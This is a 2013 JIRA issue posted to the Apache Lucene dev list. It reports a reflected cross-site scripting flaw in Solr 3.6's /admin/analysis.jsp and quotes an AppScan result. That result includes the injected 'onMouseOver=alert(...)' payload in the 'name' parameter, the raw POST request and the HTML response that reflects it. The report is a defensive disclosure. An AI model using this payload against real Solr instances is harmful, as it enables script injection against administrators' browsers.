Posted to dev@lucene.apache.org by "Rob Brooks (JIRA)" <ji...@apache.org> on 2013/01/14 19:40:13 UTC

[jira] [Created] (SOLR-4305) XSS vulnerability in Solr /admin/analysis.jsp

Rob Brooks created SOLR-4305:
--------------------------------

             Summary: XSS vulnerability in Solr /admin/analysis.jsp
                 Key: SOLR-4305
                 URL: https://issues.apache.org/jira/browse/SOLR-4305
             Project: Solr
          Issue Type: Bug
          Components: multicore
    Affects Versions: 3.6
         Environment: Solaris
            Reporter: Rob Brooks


This issue was found when running Solr 3.6 on Solaris, in a multicore setup. Each core had a cross-site scripting vulnerability found at /admin/analysis.jsp while testing using IBM Rational AppScan 8.5.0.1.

Here are the details of the scan result as given by IBM Rational AppScan:

[1 of 1] Cross-Site Scripting
Severity: High
Test Type: Application
Vulnerable URL: https://<server>/solr/<core>/admin/analysis.jsp (Parameter: name)
CVE ID(s): N/A
CWE ID(s): 79 (parent of 83)
Remediation Tasks: Review possible solutions for hazardous character injection
Variant 1 of 6 [ID=19389]
The following changes were applied to the original request:
• Set parameter 'name's value to '" onMouseOver=alert(39846)//'
Request/Response:
12/10/2012 3:33:04 PM 16/187
POST /solr/<core>/admin/analysis.jsp HTTP/1.1
Cookie: JSESSIONID=0D77846A894B8BB086394C396F19D0E9
Content-Length: 96
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0)
Host: <server>:8443
Content-Type: application/x-www-form-urlencoded
Referer: https://<server>/solr/<core>/admin/analysis.jsp?highlight=on

nt=type&name=" onMouseOver=alert(39846)//&verbose=on&highlight=on&val=1234&qverbose=on&qval=1234
HTTP/1.1 200 OK
Content-Length: 1852
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Date: Mon, 10 Dec 2012 15:54:38 GMT
<html>
<head>
<script>
var host_name="<server>"
</script>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="solr-admin.css">
<link rel="icon" href="favicon.ico" type="image/ico"></link>
<link rel="shortcut icon" href="favicon.ico" type="image/ico"></link>
<title>Solr admin page</title>
</head>
<body>
<a href="."><img border="0" align="right" height="78" width="142"
src="solr_small.png" alt="Solr"></a>
<h1>Solr Admin (Cares)
</h1>
<server><br/>
cwd=/export/home/kh SolrHome=/solr/<core>/
<br/>
HTTP caching is ON
<br clear="all">
<h2>Field Analysis</h2>
<form method="POST" action="analysis.jsp" accept-charset="UTF-8">
<table>
<tr>
<td>
<strong>Field
<select name="nt">
<option >name</option>
<option selected="selected">type</option>
</select></strong>
</td>
<td>
<input class="std" name="name" type="text" value="" onMouseOver=alert(39846)//">
</td>
</tr>
<tr>
<td>
<strong>Field value (Index)</strong>
<br/>
verbose output
<input name="verbose" type="checkbox"
checked="true" >
<br/>
highlight matches
<input name="highlight" type="checkbox"
checked="true" >
</td>
<td>
<textarea class="std" rows="8" cols="70" name="val">1234</textarea>
</td>
</tr>
<tr>
<td>
<strong>Field value (Query)</strong>
<br/>
verbose output
<input name="qverbose" type="checkbox"
checked="true" >
</td>
<td>
<textarea class="std" rows="1" cols="70" name="qval">1234</textarea>
</td>
</tr>
<tr>
<td>
</td>
<td>
<input class="stdbutton" type="submit" value="analyze">
</td>
</tr>
</table>
</form>
<strong>Unknown Field Type: " onMouseOver=alert(39846)//</strong>
</body>
</html>
Validation In Response:
• option>
<option selected="selected">type</option>
</select></strong>
</td>
<td>
<input class="std" name="name" type="text" value="" onMouseOver=alert(39846)//">
</td>
</tr>
<tr>
<td>
<strong>Field value (Index)</strong>
<br/>
verbose output
<inp
Reasoning:
The test successfully embedded a script in the response, which will be executed once the user
activates the OnMouseOver function (i.e., hovers with the mouse cursor over the vulnerable
control). This means that the application is vulnerable to Cross-Site Scripting attacks.
CWE ID:
83 (child of 79)
Vulnerable URL: https://<server>/solr/<core>/admin/threaddump.jsp
Total of 1 security issues in this URL
